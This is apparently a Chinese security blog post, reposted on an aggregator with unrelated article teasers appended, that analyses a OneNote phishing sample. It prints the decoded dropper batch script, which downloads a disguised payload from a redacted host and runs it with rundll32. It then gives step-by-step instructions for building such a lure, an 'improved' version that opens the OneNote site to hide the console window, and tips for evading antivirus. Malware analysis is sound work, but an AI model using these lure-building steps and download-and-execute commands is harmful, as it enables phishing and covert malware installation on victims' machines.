思路|如何利用oneNote钓鱼?

本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

本文来源无问社区,更多实战内容,渗透思路尽在无问社区icon-default.png?t=N7T8http://www.wwlib.cn/index.php/artread/artid/10512.html

前言

拿到了两个One Note的钓鱼样本。以 为 是个OneNote的0day,这不得分析分析搞一手。就花了点时间分析了一下,并且成功复现了手法。

沙箱分析

但凡是个正常人,肯定是不会直接双击样本的。打开用杀软先静态扫了一波,df报毒了,某60和某绒没报毒(不知道当你看到这的时候会不会报毒)。然后在虚拟机上装一个OneNote。趁这个时间,把样本扔到沙箱分析一下。这里用的是qax的沙箱。

文件概要

扔上去之后,发现已经有人在我之前跑过沙箱了,不用等了看结果。不出意外,肯定是恶意的文件,文件类型被 定义为 Powershell Script File 。这里沙箱给出的结果的是木马。emmm,还不错。

8cc998b461a7a6b9c73a57065cf1c065.png

行为分析

查看行为分析,这里给出的是:

分配可读、可写、可执行内存空间(通常为了解压自身)

7ff20d46f1737252631e86155a0a83e5.png


了解过ShellCode加载的师傅可能很熟悉这个分配可读、可写、可执行内存空间的行为了,这就是常见的一个ShellCode加载的所有的行为特征(要是我,我肯定先申请一个rw...)。所以从这里看呢,这就是一个ShellCode加载器了。继续往下看行为分析图。

行为分析图

a7524416123be67f2f025cf96ab43121.png

看到这里的调用链,狂喜,这真不会是个0day吧。One Note后调用powershell,之前我也分析过word漏洞的样本,列如之前我写过的CVE-2021-40444、CVE-2022-30190,有一点熟悉的感觉。

网络行为

网络行为这里是空的,当时很疑惑,按道理说机器上线时候是有回连c2的包的啊,不应该啊,后面再看沙箱运行的截图,发现沙箱的网络可能不通,所以这里可能就没有外连。

4bb291ca0f1bff3312dcc1af3d0d6772.png

b6fe1dca8103bdf42973fc5bde1e1459.png

手动分析

手撸一下

我先去网上找了一波OneNote文件的结构,但是没有找到,有关于.one文件的解析,但是也不重要了。拖到WinHex先看下文件头。文件头是

E4525C7B8C

开头不是504b0304(因为docx、xlsx这之类的文件其实是采用zip压缩算法的压缩包),所以.one这跟docx他们的结构还不一样,

e36e2f81e0c28a92460a9ccccc27dc07.png

没事儿,继续看。往下拖的时候,发现了里面有几张图片的文件头和文件尾的16进制数。文件里应该是有图片。拖到后面,发现了一段powershell命令。直接复制出来。

f3894cacb90593311ef55422d945869b.png

这段的大概意思就是,使用了 .NET Framework 中的 System.Text.Encoding 和 System.Convert 类。它的作用是将一个 Base64 编码的字符串转换为 ASCII 编码的字符串。 .FromBase64String 方法是 System.Convert 类中的一个方法,它接收一个 Base64 编码的字符串,并返回其对应的字节数组。因此,这段代码需要一个 Base64 编码的字符串作为参数,并将其转换为 ASCII 编码的字符串。

然后再将结果输出到文件 C:ProgramDatain.cmd 里,然后再去执行他。现在的关键点就在他执行的内容是啥了,我们将base64字符串解码。

@echo off
powershell Invoke-WebRequest -URI https://xxxxx.org/aswyw/01.gif -OutFile C:programdataputty.jpg
rundll32 C:programdataputty.jpg,Wind
exit

这里的内容主要就两句了,从web上去下载文件到 C:programdataputty.jpg ,然后用rundll32去导出里面的函数执行从而上线。他导出的函数,就是ShellCode加载的函数了。

我去访问了一下这个文件,发现这个文件已经变成空文件了,本来还想顺便掏出ida pro分析一下加载器的(谁说搞web的就不会点二进制了),顺便嫖一下人家的思路,看来是没戏了。顺便看了一下这个网站,应该是被ri了挂的文件上去,框架是WordPress的v6.1.1,版本比较新,应该是插件的洞打的。顺便说一下,另外的一个站也是WordPress的v6.1.1,怀疑是批量搂了一波站。

双击打开

静态能看的都看完了,看完这些东西,OneNote也早就装好了,双击打开文件是一个OneNote的页面,原来刚刚在WinHex看到的图片就是他们OneNote居然没有压缩。有一个open,注意这里的open。习惯随便拖一下图片,发现拖不动,但是发现文件是只读,这里我以为是跟word一样,文件属性只能读,这里卡了一会。

5071db778c042277b4676090a08eb0b4.png

然后就是随便点一下。双击open的时候会提示打开附件可能会有害,无视风险继续。会弹出powershell的窗口,直接某60就拦掉了,他这里动态还是过不了的。

02cae30fcbd8df20bac1c3887c001557.png

到这里知道了他能干什么,但是由于无法编辑,还是不能知道他是怎么制作的。一筹莫展之际,就看看文件属性,果然,这里的文件属性被设置成了只读,改掉之后继续分析。

查看历史编辑的记录,是在2月7号编辑的,时间还不是很长。

拖开open那个小图标,小黑子鸡脚就露出来了,发现了后面藏的一个cmd文件。

ff9c0c56b16d050d1a7c3070fada25e2.png

把cmd文件拖出来,里面就是我们刚刚看到的那串PowerShell代码了。

复现制作过程

制作非常简单,几乎不需要什么技巧,主要要考虑的姿势还是cmd里的内容。

首先需要两张图片,一张背景,一张用来挡住cmd文件的图标。

把背景拖入.one,置底。

9db2d4557ce272cdc57e4be6e2c596a2.png

  1. 制作cmd文件,文件名为open.cmd,这里可以自由发挥,导入.one,这里的cmd里面是windows的shell命令,总之是能上线就行。
  2. 把open这张小图片导入,然后置顶盖住cmd的图标就行。
  3. 保存之后把文件属性改为只读。

总结

1.这个样本的触发需要诱导用户手动点击,跟word的宏差不多,要是人家收到不点击,直接给你关掉就寄了,所以可用性还是不高。

2.还有就是打开会出现一个黑框,要等程序全部退出之后才会退出,这样肯定会让对面有所察觉,会被及时应急掉。我们可以加一句打开浏览器,窗口先弹出,然后浏览器弹出会盖掉窗口。同样出现浏览器出来打开了OneNote的官方网站,也会降低用户的猜忌。

@echo off
start https://www.onenote.com/
powershell Invoke-WebRequest -URI https://xxx.org/aswyw/01.gif -OutFile C:programdataputty.jpg
rundll32 C:programdataputty.jpg,Wind
exit

3.用的powershell,powershell在国内的杀软是监控很死的,动态大概率会寄掉的。所以只要用户点击了,我们能执行cmd里的命令,就不要去调powershell了,可以尝试找一下白程序去下载文件然后执行等等思路,这里就不细说,仅仅是一个抛砖引玉,欢迎师傅们跟我交流。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/46216.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[python]pycharm设置清华源

国内镜像源有以下几个,因为都是国内的,基本速度差不了太多。 清华:https://pypi.tuna.tsinghua.edu.cn/simple 阿里云:http://mirrors.aliyun.com/pypi/simple/ 中国科技大学 https://pypi.mirrors.ustc.edu.cn/simple/ 豆瓣&…

爬虫案例(读书网)(下)

上篇链接: CSDN-读书网https://mp.csdn.net/mp_blog/creation/editor/139306808 可以看见基本的全部信息:如(author、bookname、link.....) 写下代码如下: import requests from bs4 import BeautifulSoup from lxml import etreeheaders{…

scottplot5 中 使用signalXY图,如何更新数据?

🏆本文收录于《CSDN问答解答》专栏,主要记录项目实战过程中的Bug之前因后果及提供真实有效的解决方案,希望能够助你一臂之力,帮你早日登顶实现财富自由🚀;同时,欢迎大家关注&&收藏&…

Apache POI 使用Java处理Excel数据 进阶

1.POI入门教程链接 http://t.csdnimg.cn/Axn4Phttp://t.csdnimg.cn/Axn4P建议&#xff1a;从入门看起会更好理解POI对Excel数据的使用和处理 记得引入依赖&#xff1a; <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactI…

JVM高频面试点

文章目录 JVM内存模型程序计数器Java虚拟机栈本地方法栈Java堆方法区运行时常量池 Java对象对象的创建如何为对象分配内存 对象的内存布局对象头实例数据对齐填充 对象的访问定位 垃圾收集器找到垃圾引用计数法可达性分析&#xff08;根搜索法&#xff09; 引用概念的扩充回收方…

【Socket套接字编程】(实现TCP和UDP的通信)

&#x1f387;&#x1f389;&#x1f389;&#x1f389;点进来你就是我的人了 博主主页&#xff1a;&#x1f648;&#x1f648;&#x1f648;戳一戳&#xff0c;欢迎大佬指点&#xff01; 人生格言: 当你的才华撑不起你的野心的时候,你就应该静下心来学习! 欢迎志同道合的朋友…

创建通用JS公共模块并发布至npm

title: 创建通用JS公共模块并发布至npm tags: UMD rollup verdaccio npm categories: 模块化 概要内容 创建&#xff1a;JS公共模块 打包&#xff1a;使用rollup 打包公共模块 发布&#xff1a;js公共模块至verdaccio平台 发布&#xff1a;js公共模块至npm平台 如何创建JS公共模…

【PostgreSQL】Windows 上安装 PostgreSQL 16版本

博主介绍:✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌ 技术范围:SpringBoot、SpringCloud、Vue、SSM、HTML、Nodejs、Python、MySQL、PostgreSQL、大数据、物联网、机器学习等设计与开发。 感兴趣的可…

基于jeecgboot-vue3的Flowable流程仿钉钉流程设计器-支持VForm3表单的选择与支持

因为这个项目license问题无法开源&#xff0c;更多技术支持与服务请加入我的知识星球。 1、初始化的时候加载表单 /** 查询表单列表 */ const getFormList () > {listForm().then(res > formOptions.value res.result.records) } 2、开始节点的修改&#xff0c;增加表…

计算机的错误计算(三十四)

摘要 用错数预测 &#xff08;或 pow(a,x)&#xff09;函数的结果中含有的错误数字的个数&#xff0c;并与Visual Studio 和Excel 的输出中含有的错误位数相比较。结果显示&#xff0c;预测与实际一致。 对于 &#xff08;或 pow(a,x)&#xff09;函数&#xff0c;根据 与 的不…

3.RabbitMQ安装-Centos7

官方网址&#xff1a;gInstalling RabbitMQ | RabbitMQ 安装前提&#xff0c;需要一个erlang语言环境。 下载 erlang: Releases rabbitmq/erlang-rpm GitHub rabbitmq-server: 3.8.8 Releases rabbitmq/rabbitmq-server GitHub 安装命令 (说明i表示安装&#xff…

SCI一区级 | Matlab实现SSA-CNN-GRU-Multihead-Attention多变量时间序列预测

目录 效果一览基本介绍程序设计参考资料 效果一览 基本介绍 1.【SCI一区级】Matlab实现SSA-CNN-GRU-Multihead-Attention麻雀算法优化卷积门控循环单元融合多头注意力机制多变量时间序列预测&#xff0c;要求Matlab2023版以上&#xff1b; 2.输入多个特征&#xff0c;输出单个…

一文掌握Prometheus实现页面登录认证并集成grafana

一、接入方式 以保护Web站点的访问控制&#xff0c;如HTTP 服务器配置中实现安全的加密通信和身份验证&#xff0c;保护 Web 应用程序和用户数据的安全性。 1.1 加密密码 通过httpd-tools工具包来进行Web站点加密 yum install -y httpd-tools方式一&#xff1a;通过htpasswd生…

智慧物流园区整体架构方案(46页PPT)

PPT介绍 将深入探讨如何通过高度集成的信息技术和物联网设备&#xff0c;打造一个自动化、高效与可持续发展的现代物流体系。该方案从智能感知层开始&#xff0c;利用传感器、RFID技术、GPS等手段实时采集物流数据&#xff1b;接着是网络传输层&#xff0c;借助高速且稳定的通信…

姓名配对测试源码

源码简介 姓名配对测试源码&#xff0c;输入两人姓名即可测试缘分&#xff0c;可查看朋友到底喜欢谁的趣味源码。 自己手动在数据库里修改数据&#xff0c;数据库里有就会优先查询数据库的信息&#xff0c; 没设置的话第一次查询缘分都是非常好的 95-99&#xff0c;第二次查…

C++ map和set的使用

目录 0.前言 1.关联式容器 2.键值对 3.树形结构的关联式容器 3.1树形结构的特点 3.2树形结构在关联式容器中的应用 4.set 4.1概念与性质 4.2使用 5.multiset 5.1概念与性质 5.2使用 6.map 6.1概念与性质 6.2使用 7.multimap 7.1概念与性质 7.2使用 8.小结 &a…

Spring MVC 中 HttpMessageConverter 转换器

1. Spring MVC 中 HttpMessageConverter 转换器 文章目录 1. Spring MVC 中 HttpMessageConverter 转换器2. 补充&#xff1a;什么是 HTTP 消息3. 转换器3.1 转换器转换的是什么 4. Spring MVC中的 AJAX 请求5. ResponseBody 将服务器端的 return 返回值转化为“字符串(JSON格式…

rtf是什么格式的文件?rtf格式和word的区别是什么?

RTF是什么格式的文件? RTF&#xff08;富文本格式&#xff0c;Rich Text Format&#xff09;和Word文档&#xff08;以.doc和.docx为扩展名的Microsoft Word文档&#xff09;是两种常用的文本文件格式。它们在文件结构、兼容性、功能和使用场景等方面存在一些显著差异。 比如…

arcgis怎么选取某个指定区域地方的数据,比如从全国乡镇数据选取长沙市乡镇数据

一共5个步骤&#xff0c;没一句废话&#xff0c;耐心看完。 1、如图&#xff0c;先将数据加载到arcgis里面&#xff0c;我们要选取里面长沙市的范围数据。 2、选取长沙市的语句 “市” like ‘长沙%’ 切记&#xff0c;切记&#xff0c;切记。所有符号要在 输入法英文状态…

微信小程序 vant-weapp的 SwipeCell 滑动单元格 van-swipe-cell 滑动单元格不显示 和 样式问题 滑动后删除样式不显示

在微信小程序开发过程中 遇到个坑 此处引用 swipeCell 组件 刚开始是组件不显示 然后又遇到样式不生效 首先排除问题 是否在.json文件中引入了组件 {"usingComponents": {"van-swipe-cell": "vant/weapp/swipe-cell/index","van-cell-gro…